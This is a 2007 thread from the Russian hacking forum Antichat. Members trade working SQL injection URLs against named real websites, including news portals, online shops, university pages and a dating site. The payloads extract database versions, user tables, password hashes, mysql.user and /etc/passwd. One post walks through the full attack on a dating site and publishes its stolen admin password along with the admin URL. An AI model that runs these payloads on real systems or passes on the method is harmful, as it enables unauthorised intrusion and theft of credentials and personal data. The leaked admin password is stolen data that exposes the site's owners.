Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.04.2007, 21:06
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
Информационный ресурс
Код:
http://www.rocit.ru/news/ITshownews.php3?id=-19060+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),version()),char),9,10/*
|
|
|
06.04.2007, 21:39
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
iran.ru
Код:
http://iran.ru/rus/print_news.php?news_id=-36994+union+select+1,2,convert(concat(database(),char(58),user(),version()),char),4,5,6,7,8/*
|
|
|
|
06.04.2007, 21:44
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
http://e-price.org.ua/index.php?parent=1&navop=1&area=1&p=shop&show=show detail&fid=K-10001&categ=-3+union+select+1,convert(version()+using+latin1),3/*
http://www.microsym.com/content/index.php?pid=3&id=-11+union+select+1,database()--
|
|
|
|
06.04.2007, 21:53
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
beermarket.ru
Инет-магаз
http://www.beermarket.ru/catalog/catalog.php3?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),password,char(58),version()),4,5+from+ users/*
|
|
|
|
06.04.2007, 22:18
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
Наша цель :
Имя базы:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20db_name())--
Наш юзверь:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20system_user)--
Версия:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=@@version--
перебераем таблицы:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('T_LastDat','ORDERS','ClientShort','cnf_greenwood','cnf_rsi','cnf_rsi_parts','cnf_rsi_s','cnf_rsi_users'))--
Теперь перебераем колонки :
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cnf_rsi_users'+AND+COLUMN_NAME+NOT+IN+('user','u_id','user_nm','user_bd'))--
|
|
|
|
06.04.2007, 22:19
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/*
http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(login,char(58),pass,char(58),name,char(58),prof,char(58),firma,char(58),production,char(58),email,char(58),adress,char(58),telefon),4,5,6,7+from+registration+limit+10,1/*
|
|
|
|
06.04.2007, 22:31
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,user,password,6,7,8,9,10,11,12+from+mysql.user/*
http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12/*
Код:
http://www.socs.nuigalway.ie/list_socs/viewSoc.php?id=-47+union+select+1,2/*
глухарь =\ |
|
|
|
06.04.2007, 22:50
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Код:
http://exploits.elemneo.pl/index.php?download=-1+union+select+1,version(),3,4,5,6/*
скуля в базе сплойтов)) |
|
|
|
06.04.2007, 22:53
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Зараннее говорю - вы не подумайте, я в гугле набирал сайт занкомств!!! =)))
Кстати, обратите внимание на гламурную ссылку на главной странице - admin...
Решил чуток расписать...
Обращаем внимание на то, что при $link = 2-1 картинка снизу соответствует $link = 1.
http://www.freelove.in.ua/link.php?link=2-1/*
Подбираем кол - во столбцов
http://www.freelove.in.ua/link.php?link=2+order_by+64/*
Смотрим версию.
http://www.freelove.in.ua/link.php?link=20000+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64/*
Так как 5 - ая версия, можно посмотреть таблицы, колонки.
http://www.freelove.in.ua/link.php?link=20000+union+select+1,TABLE_NAME,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58,59,60,61,62,63,64+from+INFORMATION_SCHEMA.T ABLES+limit+0,1/*
Конечно можно порадоваться таблице users, в которой записаны логины и пассы в чистом виде, но админа там нет, а кому нужны акки на этом сайте? 
Поэтому идем в таблицу adminip и перебираем там колонки...
http://www.freelove.in.ua/link.php?link=20000+union+select+1,COLUMN_NAME,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64+from+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='adminip'/*
Бамс! 1 - ая колонкка и сразу pass. Ну что ж...
http://www.freelove.in.ua/link.php?link=20000+union+select+1,pass,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59,60,61,62,63,64+from+adminip/*
Админка наша, победа нафиг! =D
admin:q1a2z3x4s5w6e7d8c9v0 ( http://www.freelove.in.ua/admin.php )
Ps писанины стокоо...))
Последний раз редактировалось Fr-Ron; 06.04.2007 в 23:01..
|
|
|
|
07.04.2007, 00:13
|
|
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701
Репутация:
811
|
|
самописные форумы-это плохо
http://www.f1-world.ru/forum/message.php3?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
пойду дальше
http://www.f1-world.ru/forum/message.php3?id=-1+union+select+1,version(),3,4,user(),6,7,8,databa se(),10,11,12,13,14/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
